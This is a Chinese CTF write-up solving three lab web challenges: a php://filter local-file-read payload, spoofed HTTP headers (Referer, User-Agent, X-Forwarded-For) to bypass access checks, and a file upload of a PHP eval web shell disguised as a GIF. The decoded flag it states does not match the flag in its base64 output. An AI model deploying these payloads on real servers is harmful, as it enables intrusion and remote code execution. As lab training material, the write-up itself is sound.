1.Secret File
启动靶机后先看源码
访问源码文件后点击按钮
根据题目提示抓包看一下
那就访问 secr3t.php 如图
flag在flag.php中,但是直接访问那个文件有不行
到读取文件文件内容就需要用php伪协议
?file=php://filter/read=convert.base64-encode/resource=flag.php;
将flag.php以base64编码的形式输出
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7NjBiMWZmZWUtMGNiYi00Yjg5LWI5YjQtYzM0NDM2OWI4NjA0fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
解码获得flag. flag{697d6620-4b28-43f3-a9da-e9c1c93c0ef5}
2.HTTP
访问网址后先看源码发现注释里面有一个文件,访问文件如图
那就让它来自这个网址,bp抓包一下需要Referer。Referer(请求头字段)表示指示请求的来源页面
增加Referer:https://Sycsecret.buuoj.cn后,在响应界面点击页面渲染后如图
意思就是使用Syolover浏览器,就把User-Agent项改为Syclover
意思是只能访问本地,那就按照题目要求要增加X-Forwarded-For:127.0.0.1
X-Forwarded-For:(简称XFF)是一个HTTP扩展头部,最初由Squid缓存代理软件引入,用来表示HTTP请求端的真实IP地址。它已经成为事实上的标准.
127.0.0.1 是一个特殊的IP地址,被称为回环地址(Loopback Address),它代表本地计算机。当你在计算机上使用这个IP地址时,你实际上是在与计算机本身通信,而不是与网络上的任何其他设备通信
添加以后就可以得到flag。
3.upload
这是一道文件上传题,要上传一张图片,用一句话木马上传
GIF89a?
<script language="php">eval($_REQUEST[1])</script>
后缀为.phtml 然后bp抓包一下将Content-Type项改为image/png
Content-Type
是一个HTTP头部字段,用于指示HTTP请求或响应中数据的媒体类型(Media Type),也称为MIME类型(Multipurpose Internet Mail Extensions)。它告诉接收方数据的实际类型,以便接收方能够正确地解析和展示数据。
text/html
:HTML文档。text/plain
:纯文本数据。text/xml
:XML数据。application/json
:JSON数据。application/x-www-form-urlencoded
:表单数据,常用于文件上传。multipart/form-data
:表单数据,常用于文件上传。image/jpeg
:JPEG图片。image/png
:PNG图片
抓包后如图
蚁剑连接一下然后就可以找到flag.